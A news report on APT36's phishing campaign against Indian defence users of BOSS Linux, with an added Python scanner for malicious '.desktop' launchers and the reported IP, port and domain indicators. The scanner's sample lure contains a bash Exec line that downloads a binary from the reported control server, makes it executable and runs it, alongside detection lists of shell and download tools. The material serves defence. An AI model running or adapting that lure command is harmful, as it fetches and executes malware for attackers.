A sophisticated cyber espionage operation, attributed to the group known as APT36 (also referred to as Transparent Tribe), is actively targeting Indian defence personnel and organizations. According to a report by cybersecurity firm Cyfirma, the Pakistan-based group has escalated its tactics by deploying malicious software specifically designed for Linux environments, particularly targeting systems running BOSS Linux, an Indian Linux distribution widely used by government agencies in India.
The new attacks were first identified on June 7, 2025, as researchers revealed that the group employs deceptive phishing emails to lure victims. These emails typically contain a compressed file named “Cyber-Security-Advisory.zip,” which holds a dangerous ‘.desktop’ file. This file acts as a shortcut within Linux systems, posing as a legitimate file to entrap users.
Upon execution, the shortcut manipulates user attention by displaying a seemingly normal PowerPoint presentation, which is designed to distract while a malicious program named `BOSS.elf` is secretly downloaded and executed. This ELF binary, created in the Go programming language, serves as the primary payload responsible for compromising the victim’s system and facilitating unauthorized access to sensitive information.
Furthermore, the malware attempts to establish a connection to a control server at the IP address 101.99.92.182 on port 12520. Security researchers have flagged the domain sorlastore.com as part of the malicious infrastructure used by APT36, particularly in attacks against the Indian defence sector. The increasing sophistication of APT36’s capabilities underscores the need for enhanced cybersecurity measures against evolving threats.
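The lure described above is a `.desktop` launcher whose `Exec` line fetches and runs a payload while posing as a document. The following heuristic scanner is an added example for defenders, not code from Cyfirma or the article; it parses a `.desktop` file, flags the download-and-execute pattern, and checks for the indicators the report names (the IP, port and domain above). The sample lure is constructed for the test: the URL path and local file name are placeholders, not values from the report.

```python
"""Heuristic scanner for .desktop lure files of the kind used against BOSS Linux."""
import configparser
import re
import shlex

# Indicators named in the report; everything else below is a generic heuristic.
KNOWN_IOCS = {"101.99.92.182", "12520", "sorlastore.com"}
DOWNLOADERS = {"curl", "wget", "python", "python3", "perl", "base64"}
SHELLS = {"sh", "bash", "dash", "zsh"}
DOC_EXTS = (".ppt", ".pptx", ".pdf", ".doc", ".docx", ".xls", ".xlsx")

def parse_desktop(text):
    """Return the [Desktop Entry] section as a dict, or {} if the file is malformed."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keys such as Exec/Name are case-sensitive in .desktop files
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}

def scan_desktop(text):
    """Return human-readable findings; an empty list means nothing suspicious."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    try:
        argv = shlex.split(exec_line)
    except ValueError:
        argv = exec_line.split()
    words = set(re.findall(r"[A-Za-z0-9.]+", exec_line))  # tokens incl. IPs/domains
    findings = []
    if argv and argv[0].rsplit("/", 1)[-1] in SHELLS and "-c" in argv:
        findings.append("Exec spawns a shell with -c (inline script)")
    if words & DOWNLOADERS:
        findings.append("Exec uses a download/interpreter tool: " + ", ".join(sorted(words & DOWNLOADERS)))
    if re.search(r"chmod\s+(\+x|[0-7]*7)", exec_line):
        findings.append("Exec makes a file executable at click time")
    if KNOWN_IOCS & words:
        findings.append("Exec contains known APT36 indicator(s): " + ", ".join(sorted(KNOWN_IOCS & words)))
    name = entry.get("Name", "")
    if name.lower().endswith(DOC_EXTS):
        findings.append(f"Name '{name}' mimics a document but the entry runs a command")
    if findings and entry.get("Terminal", "false").lower() == "false":
        findings.append("Terminal=false hides the command's output from the user")
    return findings

# Constructed sample modelled on the reported lure; path and file name are placeholders.
SAMPLE_LURE = """[Desktop Entry]
Type=Application
Name=Cyber-Security-Advisory.pptx
Icon=libreoffice-impress
Terminal=false
Exec=bash -c "curl -s http://101.99.92.182:12520/PLACEHOLDER -o /tmp/BOSS.elf; chmod +x /tmp/BOSS.elf; /tmp/BOSS.elf"
"""
SAMPLE_BENIGN = "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\nTerminal=false\n"
```

Run `scan_desktop` over every `.desktop` file extracted from incoming archives or found under `~/Desktop` and `~/.local/share/applications` to surface launchers that warrant a closer look.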
Hackread.com has been closely monitoring the activities of the Transparent Tribe since its inception. The group first gained notoriety with Operation C-Major in March 2016, which utilized spear-phishing and exploited an Adobe Reader vulnerability to distribute spyware within Indian military circles. Recently, they have expanded their target base, demonstrating their adaptability by deploying Android spyware CapraRAT disguised as popular mobile applications.
Experts emphasize that organizations, particularly those in the public sector utilizing Linux systems, must take these threats seriously and adopt robust cybersecurity measures. Jason Soroko, a Senior Fellow at Sectigo, underscores the necessity for preventive measures, including disabling the auto-execution of shortcuts and employing application allow-lists. With the evolving landscape of cyber threats, maintaining proactive defensive strategies remains essential for the protection of sensitive networks.